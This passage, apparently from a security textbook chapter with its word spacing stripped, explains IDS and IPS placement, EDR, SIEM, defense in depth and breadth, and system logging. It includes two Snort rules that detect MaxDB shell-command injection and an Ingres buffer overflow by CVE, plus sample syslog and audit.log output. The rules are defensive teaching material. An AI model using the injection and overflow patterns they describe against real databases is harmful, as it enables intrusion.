NetworkdiagramshowingIDSplacementInternet/WANFirewallIDSInternalSwitchInternalNetworkItusedtobethecase,manyyearsago,thatIDSdeviceshadproblemskeepingupwithallofthetrafficcomingthroughanetwork,sincetheIDSdevicehadtolookateachpacketandcompareitagainstasmanyrulesaswereconfigured.Thisisn’tthecaseanylongerbecauseprocessingpowerhasincreasedconsiderably,ashasoverallbusthroughputinsystems.Evenso,usingmultiplesensorsacrossdifferentpartsofthenetworkcanallowforsharingtheprocessingload.SecurityTechnology 79WecantakealookatSnortrulestoseewhatanIDScandoandhowitmaywork.JustaswithWAFrules,ittakessometimeandefforttounderstandhowtowriterules,especiallyincaseswherewhatyouaretryingtodetectoniscontentinthepackets.Inthefollowingcodelisting,youwillseetwoSnortrulesthatdemonstratesomeofwhatSnortcando.SnortRulesalerttcp$EXTERNAL_NETany-­>$SQL_SERVERS7210(msg:"SQLSAPMaxDBshellcommandinjectionattempt";flow:to_server,established;content:"exec_sdbinfo";fast_pattern:only;pcre:"/exec_sdbinfo\s+[\x26\x3b\x7c\x3e\x3c]/i";metadata:policybalanced-­ipsdrop,policymax-­detect-­ipsdrop,policysecurity-­ipsdrop;reference:bugtraq,27206;reference:cve,2008-­0244;classtype:attempted-­admin;sid:13356;rev:7;)alerttcp$EXTERNAL_NETany-­>$HOME_NET21064(msg:"SQLIngresDatabaseuuid_from_charbufferoverflowattempt";flow:to_server,established;content:"uuid_from_char";fast_pattern:only;pcre:"/uuid_from_char\s*?\(\s*?[\x22\x27][^\x22\x27]{37}/smi";metadata:policybalanced-­ipsdrop,policymax-­detect-­ipsdrop,policysecurity-­ipsdrop;reference:bugtraq,24585;reference:cve,2007-­3338;reference:url,supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp;reference:url,www.ngssoftware.com/advisories/high-­risk-­vulnerability-­in-­ingres-­stack-­overflow;classtype:attempted-­admin;sid:12027;rev:11;)Snortrulesstartwithanaction.Youcanalert,asisdoneinbothoftheserules,whichgeneratesanalertmessagetowhateverisconfiguredforoutput.Inaddition,however,youcanlog,drop,reject,andpass,alongwithsomeotheractions.SomeofthesecapabilitiestakeusbeyondtraditionalIDSfunctionality,buttheyareactionsthatSnortcantakeinruleconfigurations.Aftertheaction,youconfigurethedetailsabouttheheaders.Thisincludestheprotocolyouwanttoalerton.Inourcase,wearealertingonaTCPmessage,soweneedtospecifynotonlyasourceanddestinationaddressbutalsoasourceanddestinationport.The-­>(arrow)indicatesthedirectionoftheflow.Insidetheparenthesesarethedetailsabouttherule.Firstisthemessagetouseinthelog.Afterthat,youwillfinddetailsabouttheflow.Snortisawareofwhichsideistheclientandwhichistheserver,soyoucanindicatewhichsidethemessageshouldcomefrom.Whileyou’vespecifiedsourceanddestinationports,thisisalittlemorespecification.Theimportantpartcomesnext,wherewespecifywhatthepacketshouldcontaintomatchonthisrule.Youwillalsoseemetadata,suchasreferenceinformation.Thisreferenceinformationmayincludedetailsaboutavulnerabilitythisismeanttoalerton.Finally,ruleswillhaveaSnortidentificationnumber(SID).Whilethisisconfigurable,thereareconventionsaboutnumbersthatshouldbeusedforuser-­definedrules.Valuesupto999999arereservedfortheuseofrulesthatcomewiththeSnortdistribution.Youcanalsospecifyarevisionnumber,soyoucanhavesomeversioncontrolontheSIDsyouuse.80 Chapter3  SecurityFoundations■Commonly,youwouldusealertorloginthecaseofanIDS,sincetheintentionofanIDSisjusttodetectevents.ThealertassumesthatsomeoneispayingattentiontowhattheIDSisemittingandtakingactionsbasedonthealertandasubsequentinvestigation.Thereare,though,caseswhereyoumaywanttheIDSitselftodosomethingwithwhatitfound.IntrusionPreventionSystemsAnintrusionpreventionsystem(IPS)takesanIDSastepfurther.Asnotedearlier,Snorthasactionsincludingdropandreject.TheseareactionsthatarebeyondthecapabilityofSnortitself.Snortmonitorsnetworktrafficandparsesthroughittoidentifypacketsthatcontainpossiblymaliciouscontents,asidentifiedbytherules.TohaveSnortrunasanIPS,ithastobeplacedinline,meaningithastobeadeviceinthepathoftrafficintoandoutofthenetwork.AnyIPSwouldhavetobesimilarlyconfiguredinordertohavetheabilitytoblockanynetworktraffic.Figure 3.4isasimplifiednetworkdiagramshowingthepotentialplacementofanIPS.FIGURE 3.4 NetworkdiagramshowingIPSplacementInternet/WANFirewallIPSInternalSwitchInternalNetworkSecurityTechnology 81WiththeIPSintheflow,itcanactlikeafirewall,makingdecisionsaboutwhethertoacceptorrejectpacketsastheyenterthenetwork.ThedifferencebetweenanIPSandafirewallisthatthe“firewallrules”onanIPSwouldbedynamic.RatherthanhavinglargeblanketrulesblockingIPaddresseswholesale,theIPSwouldmakedecisionsbasedonthecontentsofthepacket.TherulewouldbeinplaceforthedurationofthepacketpassingthroughtheIPS—­essentiallyaone-­off.Therulemayjustexisttohandlethatonepacket,oritmaybeinuseforalongerperiod,buttherulesaredynamicandtemporarybynature.Alsowhileinline,eithertheIPScanchoosetodropthemessage,meaningjustdiscardit,oritcanrejectitwithanappropriatemessage.ThismaybeanICMPdestinationunreachablemessage,forexample.EvenwithanIPSwherepotentialattacksareblocked,thelogsandalertsshouldbeinvestigated.NoteverymessagethatmatchesanIDS/IPSrulewillbealegitimateattack.InseveralcasesofrunningabasicSnortinstallationwiththecommunityrules,IhaverunacrossalertsindicatingbadSIPmessages,wheninfactthetrafficwasHTTPoverport80,notSIP.Rulesarenotinfallible,soitispossibleforrulestocatchlegitimatetraffic,andifyouarerunninganIPS,youmayendupblockingmessagesfromcustomersorpartners.OneofthechallengesofanIDSorIPSisthevolumeoflogstheycancreate.Thisisafactorofthenumberofrulesyouhave,howwelltheyarewritten,andhowmuchtrafficyougetintoyournetwork,aswellastheplacementofyoursensors.Alertingisasignificantchallenge,anditcanrequirealotofworktofine-­tunerulessoyouranalysts,orwhoeverislookingatthealerts,don’tbecomescreen-­blind,meaningtheygetsousedtoseeingthesamealertsoverandoverthattheyendupmissingonethatislegitimate—­awhiterabbitinafieldofwhitesnow/noise.Fortunately,therearesolutionsthatcanhelpwiththatproblem.EndpointDetectionand ResponseWhileyoumaybefamiliarwithanti-­malwaresoftware,usedtodetecttheexistenceofvirusesandothermalicioussoftwareonasystem,youmaybelessfamiliarwiththis.Endpointdetectionandresponse(EDR)isaclassofsoftwarethatcanperformarangeoffunctionsthatareusefultoasecurityoperationsstaff.ThereareseveralcommercialofferingsintheEDRspace,andeachoneofthemmayprovideadifferentsetoffunctionalities,thoughtherewillbeacoresetoffunctionstheyallprovide.Onefunctiontheymayprovideisanti-­malware.NotallEDRsolutionswillofferthissortofpreventivecontrol.AnEDRthatoffersanti-­malwaremaybefocusednotonlyonthesignaturesthatwouldbetypicalforanti-­malwarebutalsobehavior-­baseddetections.Afterall,thevendorsofthisEDRsolutionareawareofthesameTTPsthatMITREpublishessotheycanlookfortheTTPsthatwouldrelatetohowmalwaremayexpecttoinstallandrun.Theymaybeabletopreventmalwarefromexecuting,oratleastgenerateanalerttoindicatesuspiciousbehaviorwasfound.EDRsolutionsmayalsodetectothermaliciousbehavior,whichmaybedonethroughinvestigatinglogsthatareavailableonthesystem.However,themostcommonfunctionsEDRtoolswillperformisbeingabletoremotelyassesssystemsfromacentralconsole.Additionally,thesetoolscanbeusedtopullbackartifactsfromthesystems.Thismay82 Chapter3  SecurityFoundations■includesuchdetailsasprocesslistings,memorydumps,files,orlogs.Figure 3.5showsthewebinterfacefromGoogleRapidResponse(GRR),whichisanopensourceEDRtool.Itisnotasfeaturerichassomeofthecommercialtoolsavailable,butitisfreeandcanbeusedtoeasilyextractdatafromremotesystems.FIGURE 3.5 GoogleRapidResponsesystemHavingtheabilitytocapturedetailsquicklywithouthavingtogotothetargetsystemmakesresponsealotfaster.However,attackersdoknowaboutthesetoolsandmaysimplyoptnottoruniftheexistenceofthetoolisdetected.TheymayalsogointomoreextremeversionsofevasiontomakeitalotharderfortheEDRtolocatetheattackerandtheirtechniques.However,ifyouneedtobeabletocapturealotofdetailsaboutaremotesystemforanysortofinvestigation,thesetoolsareinvaluable.AnotherfunctionEDRtoolscanoftenprovideisisolation.Ifyouhappentonoticeanattackerhasgainedaccesstoasystem,youwanttokeepthemfrombeingabletogettoothersystemswithintheenvironment.Youdon’twantthemtoknowthatyouknowtheyarethere,however.Iftheyknowyouknowtheyarethere,theyeithermaygointohiding,remainingintheenvironmentwhilestayingawayfromyourpryingeyesuntilyoustopprying,ormayburneverythingdownjusttomakelifeharderforthebusiness.AnEDRtoolmaybeabletoperformsomethingcalledhostisolation.Whilethismaybeabletobedonewithinthenetwork,especiallyifyouhavefirewallcontrolswithinthenetworksegments,itcanbemoreefficienttojustuseasoftwarecontrolonthelocalsystemwheretheattackerhasbeenseen.Theattackerretainsaccesstothesystem,buttheyareSecurityTechnology 83unabletogetouttoanyothersystem.Thismaybedonewhilethecompletescopeoftheinvestigationisbeingcompleted—­tryingtofigureouteverywheretheattackeriswithintheenvironment.SecurityInformationand EventManagementAgoodpracticefromthestandpointofbothsystemadministrationandsecurityissystemlogging.Logsarehelpfultodiagnoseproblemsinthesystemandnetwork.Theycanalsohelpinaninvestigationofapotentialissue.Forensicinvestigatorsandincidentresponderswillfindtheminvaluable.Ifyou’veeverhadtotroubleshootasystemorapplicationthathasfailedwithouthavinganylogstolookat,youwillunderstandthevalueoflogs.However,turningupallloggingtothemaximumisn’ttheanswereither.Logsconsumediskspace,thoughdiskspaceisgenerallyinexpensivethesedays.Theyalsoconsumeprocessingpower,andmoreloggingcanactuallymakeithardertofindproblemsbecauseyou’rehavingtowadethroughenormousvolumesoftexttofindoneentrythatwillhelpyou.Youwon’talwaysknowthetexttosearchforafterall.Thisiswhereagoodlogmanagementsystemcanbehelpful.Inthecaseofsecurityincidents,theselogmanagementsystemscanalsoincludesearchandcorrelationtools.Whiletherearemanylogmanagementsolutions,manyorganizationsaremovingtosomethingcalledsecurityinformationandeventmanagement(SIEM).SIEMsoftware,however,isnotsimplyalogmanagementsolution.Youdon’tjustdumpallyourlogsintoitandmoveon.SIEMsoftwareisusedtocorrelateandanalyzesecurityalerts.Itwillalsoprovideyouwiththeabilitytobettervisualizeyourdata.Asanexample,inFigure 3.6,youcanseeDNSresponsecodesinKibana,whichisapartoftheElasticStack(Elasticsearch,Logstash,andKibana),formerlyknownastheELKStack.FIGURE 3.6 KibanainterfacetotheElasticStackTheElasticStackisagoodplatformtoingestlargeamountsofdatafrommultiplesources.Thiscanincludelogdataaswellaspacketdata.WhatyouseeinFigure 3.6isalistingoftheDNSresponsesthathavebeenseenbythesystemsreportingtothisElasticStackinstallation.LikeotherSIEMproducts,ElasticStackprovidesalotofsearchcapabilities.Itwillalsoprovidealargenumberofvisualizationoptionsbasedonthedatathatisbeingprovidedtoit.84 Chapter3  SecurityFoundations■Asecurityoperationscenter(SOC)willoftenbebuiltaroundmonitoringsystems,includingaSIEMsystemthatcanbeusedtocorrelatedatafromanumberofdifferentsources.TheadvantagetousingSIEMisbeingabletopullalotofdatatogethersoyoucangetabroaderpictureofwhatishappeningacrossthenetwork.Thiswillhelpyoutoseetrendsandlargerattacks.Seeinganattackinisolationmaygetyoutofocusontheoneattackyouarelookingat,ratherthanrecognizingthatthereareseveralothersystemsthatarealsobeingattacked.Asinglesystemdoesn’tnecessarilyprovideyouwiththeentrypoint.Havingdatapointscanhelptoensurethattherightcontrolsareinplacetoprotectinformationassets.Dataisonlyastartingpoint,however.Youstillneedtobeabletointerpretitandunderstandwhattodowithwhatyouhave.Astrategyisimportant.Thiscanbepoliciesandproceduresaswellasatechnologyplan.Youmayalsowanttohaveaphilosophyabouthowyouaregoingtoimplementeverythingyouhave.BeingPreparedTechnologyisallwellandgood.However,technologyinandofitselfisinsufficienttoprotectanetwork.It’sbeensaidthattheonlysecurecomputer(and,byextension,network)isonethathashadallofthecablescutand,ideally,hasbeenfilledwithcementanddroppedtothebottomoftheocean.Ifyouwanttodoanythingwithacomputer,youareexposingyourselftothepotentialforthatcomputertobecomeinfectedorcompromised.Securitycomesfromplanningandpreparation.Tobeprepared,youneedtomakesureyouhavethoughtthroughtheimplicationsofyouractions,aswellashowyouareimplementinganysolutionsyouhaveinplace.Implementingsecuritysolutionsrequiresunderstandingwhereyourresourcesare—­thisisnotonlyinformationassets.Itisalsoyourtechnologyassets.Perhapsmostimportant,itisyourhumanassets.Technologyalonewon’tbesufficient.Youcantakecareofthetechnologyaspectswithadefense-­in-­depthapproachtosecuritydesignandarchitecture.Adefense-­in-­breadthapproach,though,requireshumans.Asmentionedearlier,havinglogsisreallyimportantwhenitcomestorespondingtosecurityevents.Whileit’snicetohaveaSIEMsolution,evenifyouhaveone,youneeddatatofeedtoit.Youcangetthatdatabymakingsureyouareloggingonyoursystems.Additionally,accountinginformationisusefultohaveatrailofactivity.Defensein DepthDefenseindepthisalayeredapproachtonetworkdesign.AnytimeIhearthetermdefenseindepth,IthinkofMinasTirithintheLordoftheRingsbooks.MinasTirithisacitywithsevenconcentricwalls.InsidetheseventhwallistheCitadel.Ifaninvadersomehowmanagestobreachoneofthewalls,thepeoplefallbackintothenextringuntil,ifnecessary,theyendupinsidethefinalwall.Ideally,invaderswilleithergiveuporbedefeatedastheytrytomakeitthroughsevenenormouswalls.AsdiscoveredinthebookReturnoftheKing,though,evensevenwallsaren’talwayssufficientfordefenseofthecity.BeingPrepared 85ThereasonMinasTirithcomestomind,incaseit’snotclear,isbecauseit’sanexampleofdefenseindepth.Usingadefense-­in-­depthapproach,youwoulddesignalayerednetworkwithmultiplesecuritygatewaystocontrolaccessbetweenlayers.Oneoftheobjectivesofadefense-­in-­depthapproachistodelaytheattackeroradversary.Thegoalisn’ttopreventtheadversaryfromgettinginnecessarily.It’stocausedelays.It’salsoto,ideally,createartifactsalongtheway.Whenadefense-­in-­depthstrategyisused,asanadversarymovesthroughthelayersofthenetwork,theyleavetraces.Thesetracescanbedetectedbyoperationsstaff.Thehopeisthatthedetectionhappens,leadingtoshuttingdowntheattack,beforetheadversarygetstoanyreallysensitiveinformation.Defenseindepthisamilitaryconceptthathasbeenadaptedforotheruses.Oneofthem,ofcourse,isinformationsecurity.Onethingyouwillnoticethatyougetfromanapproachlikeamultiwalledcityisredundancy.Thesecondwallisredundantinrelationtothefirst.Thethirdisredundanttothesecond(andbyextensionthefirst),andsoon.Thisdoesn’tnecessarilymeanthatyoujustkeepplacingthesamecontrolsbacktobackeverywhere.Abetterapproachistoprovideredundantcontrolsacrossmultipleareas.Thefirstareaofcontrolstoconsiderisphysical.Thismeansensuringthatunauthorizedpeoplecan’tgetphysicalaccesstoasystem.Anyonewithphysicalaccesstoasystemhasthepotentialtogetloggedintothesystem—­asanexample,theremayalreadybeauserloggedin,andifthesystemisn’tlocked,anyonecouldbecomethelogged-­inuser.Theattackermaybeabletoboottoanexternaldriveandchangethepasswordorcreateanotheruser.Thereareafewwaysforanattackertogetaccesstoasystemiftheyhavephysicalcontrolofit.Thesecondareaofcontrolsistechnical.ThisiswhatI’vebeentalkingabout—­firewalls,intrusiondetectionsystems,SIEMs,andothersecuritytechnology.It’snotjustthat,though.Itcanbesoftwareorconfigurationcontrolslikepasswordpolicies,requiringcomplexpasswords.Antivirusorotherendpointprotectionwouldalsobeatechnicalcontrol.Anyhardwareorsoftwarethatisinplacetopreventunauthorizedusewouldbeatechnicalcontrol.Finally,thereareadministrativecontrols.Thesearethepolicies,standards,andprocedures.Thismayincludepoliciesorpracticeslikehiringstandards,backgroundchecks,anddatahandlingpolicies.Theseadministrativecontrolssetthetoneforhowtheorganizationisprotected,andtheyareessential.Figure 3.7showsanexampleofhowsomeelementsofadefense-­in-­depthapproachmightbeimplemented.Youcanseeattheentrypointtothenetworkthatthereisafirewall.Thefirewallthenhastwoseparatenetworksthatcomeoffit.Thefirstisademilitarizedzone,whichiswhereserversthatareuntrustedbutstillpartofthecorporatenetworkreside.ThisiswhereyoumightplaceInternet-­facingserverslikeweboremail.TheothersideofthefirewalliswhereyoumightputinternalserverslikeActiveDirectoryorfileservers.Thissortofnetworksegmentationisoftenpartofadefense-­in-­depthstrategy.Asecondfirewallprotectstheinternalnetworkfromtheservernetworkandviceversa.Finally,wehaveintrusiondetectionandendpointprotectioninplace.Whatisn’tshowninthisdiagramaretheproceduresandpoliciesthatareinplaceinthebusiness.Wenotonlyhaveseveraltiersinthenetworkthatanattackerwouldhavetotraverse,wealsohavedifferentdetectionandprotectionpoints.Ofcourse,thereismoretoitthanevenjustthenetworkdesign,thetechnology,andthepoliciesandprocedures.86 Chapter3  SecurityFoundations■FIGURE 3.7 Defense-­in-­depthnetworkdesignExternalFirewallDMZInternalFirewallInternalServersDesktopNetworkIntrusionDetectionSystemIntrusionDetectionSystemDesktopwithEndpointProtectionDefensein BreadthForseveralyearsnow,therehasbeensomethingofadebatebetweentheadvantagesofdefenseindepthversusthoseofdefenseinbreadth.Isdefenseindepthsufficient,ordoorganizationsneedtobeimplementingdefenseinbreadth?Ofcourse,thechallengetodefenseinbreadthisthatitisrarelyexplainedverywell.Ifyousearchforexplanationsofdefenseinbreadth,youwillfindalotofrationaleforwhydefenseinbreadthisagoodthingandwhydefenseindepthinandofitselfisinsufficientforamodernstrategytoimplementsecuritysolutionswithinanorganization.Theproblemisthatwhenyoucanfindadefinitionofwhatdefenseinbreadthis,it’sveryvague.Myunderstandingofdefenseinbreadthovertheyearshasbeenthatit’sallthesurroundthatismissingfromdefenseindepth.Defenseindepthdoesn’ttakeintoaccountallofthehumanfactors.Defenseinbreadthismeanttotakeamoreholisticlookattheorganizationfromariskperspective.Theorganizationismeanttoevaluateriskandtakeasystemiclookathowtomitigateanyrisk,takingintoaccountthethreatsthattheorganizationexpectstobeexposedto.Tofullyevaluateriskandtakeacomprehensivelookatpotentialsolutions,anorganizationneedstohavedata.Oneway,perhaps,tothinkaboutitisthatdefenseindepthisreallyaboutprevention.However,preventionisn’tentirelyrealistic.ThisisespeciallytrueinanerawheretheoldtechnicalattacksofexploitingvulnerabilitiesinlisteningservicesexposedtotheoutsideBeingPrepared 87worldarenolongerthevectorsofchoice.Instead,goingaftertheuserismoreproductive,sosocialengineeringattacksandalotofmalwarearemorecommon.Asaresult,thebestapproachtosecurityisnottofocusprimarilyonpreventionbutinsteadassumethatyouwillgetbreachedatsomepointandprepareforresponse.Tobepreparedforaresponse,youneedalotofdetectionandhistoricaldata.Additionally,youneedanincidentresponseteamwhosemembersknowwhattheirrolesare.Youalsoneedalotofcommunicationacrossdifferentteams.Themembersofthesecurityteamarenotalwaysthebestpeopletorespondtoevents,especiallysincetheymaynotalwaysbeawareofthem.Thismeansthatbreakingdownsomeofthetraditionalsilosisessential.Agrowingtrendintheinformationtechnology(IT)spaceisthecollaborationbetweendevelopmentteamsandoperationsteams,commonlyreferredtoasDevOps.Companiesthatareevenmoreforward-­thinkingarealsoensuringthatsecurityismergedinalongtheway.WhatyouendupwithissomethingthatisoftencalledDevSecOps.Theseapproachesfocusnotonlyonteamworkandtheassociatedcommunicationthatisnecessarybutalsoonautomation.Automatingbuilds,testing,anddeploymenttakesalotofthehumanfactorout,helpingtoavoidmisconfigurationsorothermistakes.Youcanseethatdefenseinbreadthcanbeaverycomplicatedideathatmaybedifficulttofullyimplementonceyoustartthinkingaboutwhereyoucaninjectsecurityconversationsintoyourorganization.Ultimately,though,thegoalofdefenseinbreadthistobebetterpositionedtonotonlyprotecttheorganizationbutalsorespondtoattacks—­also,torespondtoabreachwiththegoalofrestoringbusinessoperationsasquicklyaspossible.DefensibleNetworkArchitectureAnotherapproachtoconsiderwhenputtinganetworktogetheristouseadefensiblenetworkarchitecture.Thisdoesnotprecludeeitherdefenseindepthordefenseinbreadth.Instead,itfocusesonbuildingyournetworkinawaythatyoucanmoreeasilymonitorandcontrol.Keepinmindthatoneofthetechniquesanattackerwilluseistomovelaterally(fromsystemtosystem)withinanetworkenvironment.Thismeansoncetheyhavecompromisedonesystem,theywilltrytomovetoanothersystem.Sinceit’seasiertoseesystemsonthelocalnetwork,theymaytargetthosesystemsforawhileuntiltheygetsomeadditionalinformationaboutothersystemsonothernetworks.Attackersdon’tgenerallyhavethebigpicturewithregardtotheentireenterprisenetwork,unlesstheyhappenacrossanetworkdiagram.Ifyoucreateanetworkthathasfirewallsattheentry/exitpointsofthenetwork,acommonapproachusedtosegmentthenetwork,youhavetheabilitytomonitoralltrafficgoingintoandoutofthenetwork.Youalsohavetheabilitytocreateachokepoint,meaningifyoususpectanattackerisinonenetwork,youcanrestrictallaccesstoothernetworks.Havingthesetypesofcontrolsofblockingandmonitoringallowsyoutobetterkeeptrackofandcontroloverwhatanattackerisdoing,ifyoucatchthemlateintheattacklifecycleandtheyhavetakenupresidencetoatleastasmalldegree.Youmaynothaveblockedthemfromgettinginitialaccess,butyoushouldhavetheabilitytokeepaneyeonthemandrestrictfurtheraccesswhileyougetthecompletescopeoftheirinfiltrationofyourenvironment.88 Chapter3  SecurityFoundations■LoggingOneideathathasariseninseveralplacesalongthewayhereislogging.Thisisnotonlysystemloggingbutalsoapplicationlogging.Beyondthat,it’snotjustloggingonsystems—­desktoporserver—­butalsoonnetworkequipmentlikeroutersandswitchesandcertainlyfirewalls.EvenincaseswhereyouarerunninganIDSinthenetwork,youmaynotalwayswanttoalert,becausetheremaybesomeeventsthatyoudon’tfeelitnecessarytofollowupon.However,thefactthattheeventhappenedmaybeusefultoknowaboutonceabreachhashappened.Theimportanceofhavinghistoricaldatacan’tbeoverstated.Manysystems,includingUnix-­likesystemsaswellasnetworkdevices,willsupportthesyslogprotocol.ThisisaloggingprotocolthatbeganastheloggingmechanismfortheSimpleMailTransferProtocol(SMTP)serversendmail.Overtheyearssincethe1980s,whensyslogwasfirstimplementedinsendmail,ithasbecomethestandardloggingsolutiononUnix-­likesystems,andtheprotocolhasbeendocumentedinRFC3164,laterstandardizedinRFC5424.Syslognotonlyhasaneasy-­to-­understandsyntaxinthecreationandreadingofmessages,italsocanbeusedforremoteloggingaswellaslocallogging.Becausesyslogcansupportremotelogging,itcanbeusedasacentralizedloghost.Thisfactis,perhaps,especiallyimportantwhenpreparingforincidentresponse.Acommonapproachtowipingyourtracksistowipelogs.Anyattackerwhogetsaccesstoasystemmaybeabletowipethelocallogs,butiftheyarestreamingoffthesystem,theyareretainedforlateruse,unlesstheattackercancompromisethecentralloghost.Youcanseeanexampleofsyslogmessagesinthefollowingcodelisting.Eachmessagestartswiththedate,followedbytheoriginatinghostname.Afterthatistheprocessthatcreatedthelog,includingtheprocessidentificationnumber.Finally,themessagethattheprocessgeneratedisshown.syslogMessagesJun2610:27:16boardinghousekernel:[923361.001444]vmbr0:port3(tap210i0)enteredforwardingstateJun2610:27:17boardinghousepvedaemon[10864]:endtaskUPID:boardinghouse:000034F1:0580EE23:5B326963:qmstart:210:[email protected]pam:OKJun2610:27:42boardinghousepvedaemon[9338]:startingtaskUPID:boardinghouse:00003552:0580F8B5:5B32697E:vncproxy:210:root@pam:Jun2610:32:09boardinghousepvedaemon[9338]:endtaskUPID:boardinghouse:00003552:0580F8B5:5B32697E:vncproxy:210:root@pam:OKThesyslogstandarddefinesfacilitiestocategorizemessagessotheycanberoutedtodifferentlocations.Anymessagesrelatedtoauthentication,forexample,canbeputintoasinglefile,awayfromothertypesofmessages.EachfacilitycanberoutedtoadifferentfileBeingPrepared 89orevenadifferentsystem,ifyouwantedsomelogmessagesstoredlocallyandothersstoredcentrally.Insomesyslogimplementations,youcanstorebothlocallyandremotely.Thisprovideslocallogsaswellasremotelogsthatfunctionasbackups.Beyondfacilities,syslogdefinesseverity.Thismeansapplicationscandeterminethelevelofanevent,includinginformational,debug,warning,anderror.Justaswithfacilities,severitiescanberedirectedtodifferentlocations.NoteverysystemisUnix-­like,ofcourse.Windowssystemsareverycommon,onthedesktopaswellastheserver.OnWindowssystems,logmessagesgetsenttotheeventsubsystem.Insteadofthetext-­basedmessagesthatsysloguses,theeventsubsystemusesabinarystoragesystem.Ofcourse,oneadvantageofthewaytheeventsubsystemstoresdataisthatitcanbequeried,asthoughitwereadatabase.Whileit’snotaseasytoparsemessages,thefactthatyoucanquerymessagesmeansyoucaneasilyreturnrelatedmessageswithasinglequery.TheeventsubsysteminWindowsalsohasalargeamountofdata.Inadditiontothedifferentcategories,suchassystem,security,andapplication,thereareeventIDs.AneventIDcanidentifyallentriesthatarethesame.SearchingfortheeventIDcangiveyoueveryinstanceofaparticularevent,whichmayoccuracrossmultipleprocesses.Figure 3.8showsasingleeventfromtheWindowsEventViewerwhereyoucanseetheeventID.YoucanalsoseeotherpiecesofinformationthatcomewitheacheventintheEventViewer.FIGURE 3.8 EventViewer90 Chapter3  SecurityFoundations■Inbothcases,applicationdeveloperscanmakeuseofthesystem-­providedloggingfunctionality.OntheUnixside,anydevelopercanwritetosyslogandthesyslogservicewilltakecareofwritingthelogsoutbasedonthedefinitionintheconfigurationfile.Thistakestheonusofdevelopingloggingschemesoffthedevelopersandalsoensuresasingleplacetogoforlogmessages.ThesameistrueonWindowssystems.Anyapplicationdevelopercanmakeuseoftheeventsubsystem,usingittowritelogmessages.TheapplicationcanevenhaveitsownlogfileandWindowswillbreakthelogsouttoseparatelocations.IfyouweretogointotheEventViewerapplication,youwouldbeabletolookatalltheeventlogentriesandthedifferentcategoriestheeventlogsfellinto.YouwouldtypicallyseealistofalltheapplicationsWindowsisloggingfor.Anyapplicationcouldhaveitsownentryinthatlisttokeepthelogsseparatefromthesystemwhileit’sstillloggedtothesamelocationasalltheotherlogs.AuditingLogsareimportant,andwegenerallyrelyonapplicationdeveloperstoimplementloggingand,ideally,configurablelogging,meaningdifferentlevelsoflogmessages.Beingabletoturnuploggingtoaverboselevelcanmaketroubleshootingproblemsmucheasier.Thesameistruefortheoperatingsystem.Thisiswhereauditingcancomein.BothUnix-­likesystemsandWindowssystemsoffertheabilitytoenableandconfigureauditing.Ofcourse,thedefinitionofauditingisdifferentacrossthetwosystems.OnWindowssystems,auditingisasecurityfunction.Itrelatestosuccessorfailureofsystemevents.Thiscanincludesuccessorfailureoflogins,forexample,oraccesstofilesonthesystem.Figure 3.9showsthesettingsoftheauditpolicywithintheLocalSecurityPolicyapplication.Eachcategoryinthepolicycanhavesuccessorfailurelogged.Thisisn’taneither/or,though.Youcanlogbothsuccessandfailure.Iftheauditeventsaretriggered,theywillshowupinthesecuritylogintheWindowsEventViewer.FIGURE 3.9 AuditPolicyinWindowsBeingPrepared 91OntheLinuxside,thereisacompletelydifferentauditinginfrastructure.Usingtheprogramauditctl,auditpoliciescanbemanagedonaLinuxsystem.TheauditingsubsystemintheLinuxkernelcanbeusedtowatchfilesanddirectoriesforactivity.Itcanbeusedtomonitorapplicationexecution.Perhapsmostimportant,itcanalsobeusedtomonitorsystemcalls.Anysystemcallusedbyanyprogramonthesystemcanbemonitoredandlogged.Theauditsubsystemtypicallyhasitsownsetoflogs.Anexampleofsomeofthelogentriesfromaudit.logonaCentOSLinuxsystemisshowninthefollowingcodelisting.audit.logSampleOutputtype=USER_LOGINmsg=audit(1530130008.763:341):pid=9711uid=0auid=0ses=30msg='op=loginid=0exe="/usr/sbin/sshd"hostname=binkley.lanaddr=192.168.86.49terminal=/dev/pts/0res=success'type=USER_STARTmsg=audit(1530130008.765:342):pid=9711uid=0auid=0ses=30msg='op=loginid=0exe="/usr/sbin/sshd"hostname=binkley.lanaddr=192.168.86.49terminal=/dev/pts/0res=success'type=CONFIG_CHANGEmsg=audit(1530130271.424:353):auid=4294967295ses=4294967295op=add_rulekey=(null)list=4res=1type=SERVICE_STARTmsg=audit(1530130271.424:354):pid=1uid=0auid=4294967295ses=4294967295msg='unit=auditdcomm="systemd"exe="/usr/lib/systemd/systemd"hostname=?addr=?terminal=?res=success'type=SYSCALLmsg=audit(1530130283.962:355):arch=c000003esyscall=59success=yesexit=0a0=106e000a1=1063a90a2=10637e0a3=7ffec3721e70items=2ppid=9711pid=9908auid=0uid=0gid=0euid=0suid=0fsuid=0egid=0sgid=0fsgid=0tty=pts0ses=30comm="cat"exe="/usr/bin/cat"key=(null)type=EXECVEmsg=audit(1530130283.962:355):argc=2a0="cat"a1="audit.log"type=CWDmsg=audit(1530130283.962:355):cwd="/var/log/audit"type=PATHmsg=audit(1530130283.962:355):item=0name="/usr/bin/cat"inode=2799dev=fd:00mode=0100755ouid=0ogid=0rdev=00:00objtype=NORMALcap_fp=0000000000000000cap_fi=0000000000000000cap_fe=0cap_fver=0type=PATHmsg=audit(1530130283.962:355):item=1name="/lib64/ld-­linux-­x86-­64.so.2"inode=33559249dev=fd:00mode=0100755ouid=0ogid=0rdev=00:00objtype=NORMALcap_fp=0000000000000000cap_fi=0000000000000000cap_fe=0cap_fver=0type=PROCTITLEmsg=audit(1530130283.962:355):proctitle=6361740061756469742E6C6F67Eachentryprovidesdetailsaboutthetypeoftheentry,whichindicateswhattheauditsubsystemhasdetected.Forexample,thefirstentryindicatesthatauserhasloggedin.Youcanseefromthedetailsthattheaddresstheconnectioncamefromis192.168.86.49,thattheexecutableis/usr/sbin/sshd,andthattheresultwasasuccess.Otherentriesindicatefileactions,programexecutions,andconfigurationchanges.92 Chapter3  